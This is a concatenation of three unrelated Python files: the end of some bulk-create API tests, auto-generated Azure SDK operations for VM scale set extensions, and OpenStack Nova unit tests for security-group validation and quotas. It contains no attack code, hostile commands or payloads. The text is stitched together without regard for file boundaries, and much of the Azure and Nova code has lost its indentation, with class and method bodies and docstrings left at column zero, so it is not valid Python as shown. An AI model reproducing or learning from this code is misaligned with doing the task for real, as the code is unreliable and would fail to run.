        }, auth=user.auth, expect_errors=True, bulk=True)
        assert res.status_code == 404

        project.reload()
        assert len(project.nodes) == 0

    def test_bulk_creates_children_payload_errors(
            self, app, user, project, child_two, url):
        # def test_bulk_creates_children_no_type(self, app, user, project,
        # child_two, url):
        child = {
            'data': [child_two, {
                'attributes': {
                    'title': 'child',
                    'description': 'this is a child project',
                    'category': 'project',
                }
            }]
        }
        res = app.post_json_api(
            url, child, auth=user.auth,
            expect_errors=True, bulk=True)
        assert res.status_code == 400
        assert res.json['errors'][0]['detail'] == 'This field may not be null.'
        assert res.json['errors'][0]['source']['pointer'] == '/data/1/type'
        project.reload()
        assert len(project.nodes) == 0

        # def test_bulk_creates_children_incorrect_type(self, app, user, project,
        # child_two, url):
        child = {
            'data': [child_two, {
                'type': 'Wrong type.',
                'attributes': {
                    'title': 'child',
                    'description': 'this is a child project',
                    'category': 'project',
                }
            }]
        }
        res = app.post_json_api(
            url, child, auth=user.auth,
            expect_errors=True, bulk=True)
        assert res.status_code == 409
        assert res.json['errors'][0]['detail'] == 'This resource has a type of "nodes", but you set the json body\'s type field to "Wrong type.". You probably need to change the type field to match the resource\'s type.'
        project.reload()
        assert len(project.nodes) == 0

        # def test_bulk_creates_children_properties_not_nested(self, app, user,
        # project, child_two, url):
        child = {
            'data': [child_two, {
                'title': 'child',
                'description': 'this is a child project',
                'category': 'project',
            }]
        }
        res = app.post_json_api(
            url, child, auth=user.auth,
            expect_errors=True, bulk=True)
        assert res.status_code == 400
        assert res.json['errors'][0]['detail'] == 'Request must include /data/attributes.'
        assert res.json['errors'][0]['source']['pointer'] == '/data/attributes'
        project.reload()
        assert len(project.nodes) == 0
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
# Type aliases used by the request builders and operations below.
T = TypeVar('T')
JSONType = Any
# Optional per-call hook: receives the pipeline response, the deserialized
# model, and the response headers.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]

# Shared parameter serializer; client-side validation is disabled, the
# generated-code default (the service validates authoritatively).
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_create_or_update_request_initial(
    resource_group_name: str,
    vm_scale_set_name: str,
    vmss_extension_name: str,
    subscription_id: str,
    *,
    json: JSONType = None,
    content: Any = None,
    **kwargs: Any
) -> HttpRequest:
    """Build the PUT request that starts a VMSS-extension create/update
    (api-version 2018-04-01).  *json*/*content* carry the serialized
    ``VirtualMachineScaleSetExtension`` body."""
    content_type = kwargs.pop('content_type', None)  # type: Optional[str]

    # Substitute the ARM path parameters into the resource URL template.
    template = kwargs.pop(
        "template_url",
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}',
    )
    url = _format_url_section(
        template,
        resourceGroupName=_SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        vmScaleSetName=_SERIALIZER.url("vm_scale_set_name", vm_scale_set_name, 'str'),
        vmssExtensionName=_SERIALIZER.url("vmss_extension_name", vmss_extension_name, 'str'),
        subscriptionId=_SERIALIZER.url("subscription_id", subscription_id, 'str'),
    )

    # Query string: only the api-version is sent.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", "2018-04-01", 'str')

    # Headers: advertise JSON and, when a body is present, its content type.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    if content_type is not None:
        headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
    headers['Accept'] = _SERIALIZER.header("accept", "application/json", 'str')

    return HttpRequest(
        method="PUT",
        url=url,
        params=params,
        headers=headers,
        json=json,
        content=content,
        **kwargs
    )
def build_delete_request_initial(
    resource_group_name: str,
    vm_scale_set_name: str,
    vmss_extension_name: str,
    subscription_id: str,
    **kwargs: Any
) -> HttpRequest:
    """Build the DELETE request that starts removal of a VMSS extension
    (api-version 2018-04-01)."""
    # Substitute the ARM path parameters into the resource URL template.
    template = kwargs.pop(
        "template_url",
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}',
    )
    url = _format_url_section(
        template,
        resourceGroupName=_SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        vmScaleSetName=_SERIALIZER.url("vm_scale_set_name", vm_scale_set_name, 'str'),
        vmssExtensionName=_SERIALIZER.url("vmss_extension_name", vmss_extension_name, 'str'),
        subscriptionId=_SERIALIZER.url("subscription_id", subscription_id, 'str'),
    )

    # Query string: only the api-version is sent.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", "2018-04-01", 'str')

    return HttpRequest(
        method="DELETE",
        url=url,
        params=params,
        **kwargs
    )
def build_get_request(
    resource_group_name: str,
    vm_scale_set_name: str,
    vmss_extension_name: str,
    subscription_id: str,
    *,
    expand: Optional[str] = None,
    **kwargs: Any
) -> HttpRequest:
    """Build the GET request for a single VMSS extension (api-version
    2018-04-01).  *expand* is forwarded as the ``$expand`` query option."""
    # Substitute the ARM path parameters into the resource URL template.
    template = kwargs.pop(
        "template_url",
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}',
    )
    url = _format_url_section(
        template,
        resourceGroupName=_SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        vmScaleSetName=_SERIALIZER.url("vm_scale_set_name", vm_scale_set_name, 'str'),
        vmssExtensionName=_SERIALIZER.url("vmss_extension_name", vmss_extension_name, 'str'),
        subscriptionId=_SERIALIZER.url("subscription_id", subscription_id, 'str'),
    )

    # Query string: optional $expand plus the api-version.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    if expand is not None:
        params['$expand'] = _SERIALIZER.query("expand", expand, 'str')
    params['api-version'] = _SERIALIZER.query("api_version", "2018-04-01", 'str')

    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", "application/json", 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=params,
        headers=headers,
        **kwargs
    )
def build_list_request(
    resource_group_name: str,
    vm_scale_set_name: str,
    subscription_id: str,
    **kwargs: Any
) -> HttpRequest:
    """Build the GET request that lists all extensions of a VM scale set
    (api-version 2018-04-01)."""
    # Substitute the ARM path parameters into the resource URL template.
    template = kwargs.pop(
        "template_url",
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions',
    )
    url = _format_url_section(
        template,
        resourceGroupName=_SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        vmScaleSetName=_SERIALIZER.url("vm_scale_set_name", vm_scale_set_name, 'str'),
        subscriptionId=_SERIALIZER.url("subscription_id", subscription_id, 'str'),
    )

    # Query string: only the api-version is sent.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", "2018-04-01", 'str')

    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", "application/json", 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=params,
        headers=headers,
        **kwargs
    )
class VirtualMachineScaleSetExtensionsOperations(object):
"""VirtualMachineScaleSetExtensionsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2018_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
    def __init__(self, client, config, serializer, deserializer):
        # Store the pipeline client, the msrest (de)serializers, and the
        # client configuration (which carries subscription_id) injected by
        # the generated service client.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    def _create_or_update_initial(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        vmss_extension_name: str,
        extension_parameters: "_models.VirtualMachineScaleSetExtension",
        **kwargs: Any
    ) -> "_models.VirtualMachineScaleSetExtension":
        # Initial PUT of the long-running create/update operation; the
        # public polling wrapper is begin_create_or_update.
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VirtualMachineScaleSetExtension"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]

        # Serialize the model into the JSON request body.
        _json = self._serialize.body(extension_parameters, 'VirtualMachineScaleSetExtension')

        request = build_create_or_update_request_initial(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            vmss_extension_name=vmss_extension_name,
            subscription_id=self._config.subscription_id,
            content_type=content_type,
            json=_json,
            template_url=self._create_or_update_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        # 200 (updated) and 201 (created) both carry the extension body.
        if response.status_code == 200:
            deserialized = self._deserialize('VirtualMachineScaleSetExtension', pipeline_response)

        if response.status_code == 201:
            deserialized = self._deserialize('VirtualMachineScaleSetExtension', pipeline_response)

        if cls:
            # let the caller-supplied hook transform the response
            return cls(pipeline_response, deserialized, {})

        return deserialized

    _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}'}  # type: ignore
@distributed_trace
def begin_create_or_update(
self,
resource_group_name: str,
vm_scale_set_name: str,
vmss_extension_name: str,
extension_parameters: "_models.VirtualMachineScaleSetExtension",
**kwargs: Any
) -> LROPoller["_models.VirtualMachineScaleSetExtension"]:
"""The operation to create or update an extension.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set where the extension should be create or
updated.
:type vm_scale_set_name: str
:param vmss_extension_name: The name of the VM scale set extension.
:type vmss_extension_name: str
:param extension_parameters: Parameters supplied to the Create VM scale set Extension
operation.
:type extension_parameters:
~azure.mgmt.compute.v2018_04_01.models.VirtualMachineScaleSetExtension
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualMachineScaleSetExtension or the
result of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.mgmt.compute.v2018_04_01.models.VirtualMachineScaleSetExtension]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetExtension"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
vmss_extension_name=vmss_extension_name,
extension_parameters=extension_parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('VirtualMachineScaleSetExtension', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}'} # type: ignore
def _delete_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
vmss_extension_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
vmss_extension_name=vmss_extension_name,
subscription_id=self._config.subscription_id,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}'} # type: ignore
@distributed_trace
def begin_delete(
self,
resource_group_name: str,
vm_scale_set_name: str,
vmss_extension_name: str,
**kwargs: Any
) -> LROPoller[None]:
"""The operation to delete the extension.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set where the extension should be deleted.
:type vm_scale_set_name: str
:param vmss_extension_name: The name of the VM scale set extension.
:type vmss_extension_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
vmss_extension_name=vmss_extension_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}'} # type: ignore
@distributed_trace
def get(
self,
resource_group_name: str,
vm_scale_set_name: str,
vmss_extension_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.VirtualMachineScaleSetExtension":
"""The operation to get the extension.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set containing the extension.
:type vm_scale_set_name: str
:param vmss_extension_name: The name of the VM scale set extension.
:type vmss_extension_name: str
:param expand: The expand expression to apply on the operation.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualMachineScaleSetExtension, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2018_04_01.models.VirtualMachineScaleSetExtension
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetExtension"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
vmss_extension_name=vmss_extension_name,
subscription_id=self._config.subscription_id,
expand=expand,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualMachineScaleSetExtension', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}'} # type: ignore
@distributed_trace
def list(
self,
resource_group_name: str,
vm_scale_set_name: str,
**kwargs: Any
) -> Iterable["_models.VirtualMachineScaleSetExtensionListResult"]:
"""Gets a list of all extensions in a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set containing the extension.
:type vm_scale_set_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualMachineScaleSetExtensionListResult or the
result of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.compute.v2018_04_01.models.VirtualMachineScaleSetExtensionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetExtensionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
subscription_id=self._config.subscription_id,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("VirtualMachineScaleSetExtensionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions'} # type: ignore
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation
# Copyright 2012 Justin Santa Barbara
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
import mox
from oslo.config import cfg
import webob
from nova.api.openstack.compute.contrib import security_groups
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import compute
import nova.db
from nova import exception
from nova.openstack.common import jsonutils
from nova import quota
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import utils
CONF = cfg.CONF  # global oslo.config registry; quota_security_groups is read from it below
# Fixed instance UUIDs shared by the fake DB stubs in this module.
FAKE_UUID1 = 'a47ae74e-ab08-447f-8eee-ffd43fc46c16'
FAKE_UUID2 = 'c6e6430a-6563-4efa-9542-5e93c9e97d18'
class AttrDict(dict):
    """Dict whose keys are also readable as attributes (used as fake DB rows).

    Missing keys surface as :class:`AttributeError`, as the attribute
    protocol requires.
    """
    def __getattr__(self, k):
        # Translate KeyError to AttributeError: raising KeyError from
        # __getattr__ breaks hasattr(), getattr(obj, name, default) and
        # protocols (e.g. copy/pickle) that probe for optional attributes.
        try:
            return self[k]
        except KeyError:
            raise AttributeError(k)
def security_group_template(**kwargs):
    """Build an API-style security-group dict.

    Keyword arguments override the test defaults; unknown keys pass through.
    """
    template = {
        'tenant_id': '123',
        'name': 'test',
        'description': 'test-description',
    }
    template.update(kwargs)
    return template
def security_group_db(security_group, id=None):
    """Convert an API-style security-group dict into a fake DB row.

    Renames ``tenant_id`` to the DB column name ``project_id``, optionally
    overrides the id, and guarantees ``rules``/``instances`` lists exist.
    Returns an AttrDict so tests can use attribute access.
    """
    row = dict(security_group)
    if 'tenant_id' in row:
        row['project_id'] = row.pop('tenant_id')
    if id is not None:
        row['id'] = id
    for key in ('rules', 'instances'):
        row.setdefault(key, [])
    return AttrDict(row)
def security_group_rule_template(**kwargs):
    """Build an API-style security-group-rule dict with test defaults."""
    rule = {
        'ip_protocol': 'tcp',
        'from_port': 22,
        'to_port': 22,
        'parent_group_id': 2,
    }
    rule.update(kwargs)
    return rule
def security_group_rule_db(rule, id=None):
    """Convert an API-style rule dict into a fake DB row (AttrDict).

    Renames ``ip_protocol`` to the DB column name ``protocol``.
    NOTE(review): ``id`` is accepted for symmetry with security_group_db but
    is currently ignored — confirm that is intentional.
    """
    row = dict(rule)
    if 'ip_protocol' in row:
        row['protocol'] = row.pop('ip_protocol')
    return AttrDict(row)
def return_server(context, server_id):
    """Stub for nova.db.instance_get: a running instance on localhost."""
    server = {
        'id': int(server_id),
        'power_state': 0x01,
        'host': 'localhost',
        'uuid': FAKE_UUID1,
        'name': 'asdf',
    }
    return server
def return_server_by_uuid(context, server_uuid):
    """Stub for nova.db.instance_get_by_uuid: running instance with id 1."""
    server = {'uuid': server_uuid, 'name': 'asdf'}
    server.update(id=1, power_state=0x01, host='localhost')
    return server
def return_non_running_server(context, server_id):
    """Stub returning an instance whose power_state (0x02) is not RUNNING.

    Note: unlike return_server, ``server_id`` is passed through unconverted.
    """
    return {
        'id': server_id,
        'power_state': 0x02,
        'uuid': FAKE_UUID1,
        'host': 'localhost',
        'name': 'asdf',
    }
def return_security_group_by_name(context, project_id, group_name):
    """Stub for security_group_get_by_name: group attached to one instance."""
    member = {'id': 1, 'uuid': FAKE_UUID1}
    return {'id': 1, 'name': group_name, 'instances': [member]}
def return_security_group_without_instances(context, project_id, group_name):
    """Stub for security_group_get_by_name: group with no instances attached."""
    return dict(id=1, name=group_name)
def return_server_nonexistent(context, server_id):
    # Stub for the nova.db.instance_get* calls: always reports the instance
    # as missing so handlers' not-found paths can be exercised.
    raise exception.InstanceNotFound(instance_id=server_id)
class TestSecurityGroups(test.TestCase):
def setUp(self):
super(TestSecurityGroups, self).setUp()
self.controller = security_groups.SecurityGroupController()
self.server_controller = (
security_groups.ServerSecurityGroupController())
self.manager = security_groups.SecurityGroupActionController()
# This needs to be done here to set fake_id because the derived
# class needs to be called first if it wants to set
# 'security_group_api' and this setUp method needs to be called.
if self.controller.security_group_api.id_is_uuid:
self.fake_id = '11111111-1111-1111-1111-111111111111'
else:
self.fake_id = '11111111'
def _assert_no_security_groups_reserved(self, context):
"""Check that no reservations are leaked during tests."""
result = quota.QUOTAS.get_project_quotas(context, context.project_id)
self.assertEqual(result['security_groups']['reserved'], 0)
def test_create_security_group(self):
sg = security_group_template()
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
res_dict = self.controller.create(req, {'security_group': sg})
self.assertEqual(res_dict['security_group']['name'], 'test')
self.assertEqual(res_dict['security_group']['description'],
'test-description')
def test_create_security_group_with_no_name(self):
sg = security_group_template()
del sg['name']
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPUnprocessableEntity,
self.controller.create, req, sg)
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_no_description(self):
sg = security_group_template()
del sg['description']
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_blank_name(self):
sg = security_group_template(name='')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_whitespace_name(self):
sg = security_group_template(name=' ')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_blank_description(self):
sg = security_group_template(description='')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_whitespace_description(self):
sg = security_group_template(description=' ')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_duplicate_name(self):
sg = security_group_template()
# FIXME: Stub out _get instead of creating twice
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.controller.create(req, {'security_group': sg})
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_no_body(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPUnprocessableEntity,
self.controller.create, req, None)
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_no_security_group(self):
body = {'no-securityGroup': None}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPUnprocessableEntity,
self.controller.create, req, body)
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_above_255_characters_name(self):
sg = security_group_template(name='1234567890' * 26)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_above_255_characters_description(self):
sg = security_group_template(description='1234567890' * 26)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_non_string_name(self):
sg = security_group_template(name=12)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_non_string_description(self):
sg = security_group_template(description=12)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_quota_limit(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
for num in range(1, CONF.quota_security_groups + 1):
name = 'test%s' % num
sg = security_group_template(name=name)
res_dict = self.controller.create(req, {'security_group': sg})
self.assertEqual(res_dict['security_group']['name'], name)
sg = security_group_template()
self.assertRaises(exception.SecurityGroupLimitExceeded,
self.controller.create,
req, {'security_group': sg})
def test_get_security_group_list(self):
groups = []
for i, name in enumerate(['default', 'test']):
sg = security_group_template(id=i + 1,
name=name,
description=name + '-desc',
rules=[])
groups.append(sg)
expected = {'security_groups': groups}
def return_security_groups(context, project_id):
return [security_group_db(sg) for sg in groups]
self.stubs.Set(nova.db, 'security_group_get_by_project',
return_security_groups)
